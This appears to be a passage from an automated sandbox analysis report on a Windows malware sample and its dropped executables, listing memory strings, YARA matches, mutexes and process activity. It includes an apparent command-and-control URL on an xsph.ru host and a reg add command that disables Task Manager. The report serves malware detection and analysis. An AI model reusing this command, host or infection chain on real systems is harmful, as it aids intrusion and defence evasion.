0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000310C000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 
00000027.00000002.2287171335.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtr
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.00000000030D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000003059000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1705381265.000000001BE4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.00000000034E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2194422179.000000001C143000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40
            Source: SurrogateContainerAgent.exe, 00000005.00000002.1476955180.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003413000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003826000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html

            System Summary

            barindex
            Source: 5.2.SurrogateContainerAgent.exe.37f5750.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 42.2.zTShuhFeOCWKXCInUCSTgJmE.exe.3772f08.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 31.2.zTShuhFeOCWKXCInUCSTgJmE.exe.335e9c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 20.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2e04cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: 39.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2c3e770.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0034718C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034857B0_2_0034857B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036D00E0_2_0036D00E
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034407E0_2_0034407E
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003570BF0_2_003570BF
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003711940_2_00371194
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034E2A00_2_0034E2A0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003432810_2_00343281
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003602F60_2_003602F6
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003566460_2_00356646
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036473A0_2_0036473A
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036070E0_2_0036070E
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003427E80_2_003427E8
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003537C10_2_003537C1
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034E8A00_2_0034E8A0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034F9680_2_0034F968
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_003649690_2_00364969
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00353A3C0_2_00353A3C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00356A7B0_2_00356A7B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036CB600_2_0036CB60
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00360B430_2_00360B43
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00355C770_2_00355C77
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034ED140_2_0034ED14
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_00353D6D0_2_00353D6D
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035FDFA0_2_0035FDFA
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034BE130_2_0034BE13
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_0034DE6C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_00345F3C
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_00360F78
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 20_2_00007FF887B05AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB3888
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB4FA0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BACD68
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BAACB8
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB2380
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB7A48
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BAA1DB
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BAC738
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB43E0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BAAB28
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB8A30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 28_2_00007FF887BB5AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 31_2_00007FF887BA5AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BB3888
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BB4FA0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BACD68
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BB2380
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BAA1DB
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BB43E0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BAAB28
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BB8A30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 36_2_00007FF887BB5AC0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB3888
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB2445
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB5F21
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB4E6D
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB6DCD
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB43E0
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB8A30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB1DA9
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Code function: 39_2_00007FF887BB5AC0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: String function: 0035ED00 appears 31 times
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: String function: 0035E360 appears 52 times
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: String function: 0035E28C appears 35 times
            Source: SurrogateContainerAgent.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe.5.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: adKGhCOOzg.exe, 00000000.00000003.1349439122.0000000003472000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000003.1349439122.0000000003472000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000002.1350105554.0000000003472000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000002.1350105554.0000000003472000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000003.1349412124.0000000003487000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe, 00000000.00000003.1349412124.0000000003487000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs adKGhCOOzg.exe
            Source: adKGhCOOzg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: 5.2.SurrogateContainerAgent.exe.37f5750.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 42.2.zTShuhFeOCWKXCInUCSTgJmE.exe.3772f08.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 31.2.zTShuhFeOCWKXCInUCSTgJmE.exe.335e9c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 20.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2e04cc8.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 39.2.zTShuhFeOCWKXCInUCSTgJmE.exe.2c3e770.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
            Source: 5.2.SurrogateContainerAgent.exe.38823f8.8.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.37cb250.4.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.3923498.18.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.1c5d0000.33.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.SurrogateContainerAgent.exe.1c530000.29.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@61/23@1/1
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_00346EC9 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Code function: 0_2_00359E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SurrogateContainerAgent.exe.log
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_03
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\03200b193f5b3654f058ad1d9fd2571cad4b5a01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | File created: C:\Users\user\AppData\Local\Temp\K0Xr29C3HF
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Command line argument: sfxname (0_2_0035D5D4)
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Command line argument: sfxstime (0_2_0035D5D4)
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Command line argument: STARTDLG (0_2_0035D5D4)
            Source: C:\Users\user\Desktop\adKGhCOOzg.exe | Command line argument: xj9 (0_2_0035D5D4)
            Source: adKGhCOOzg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: adKGhCOOzg.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
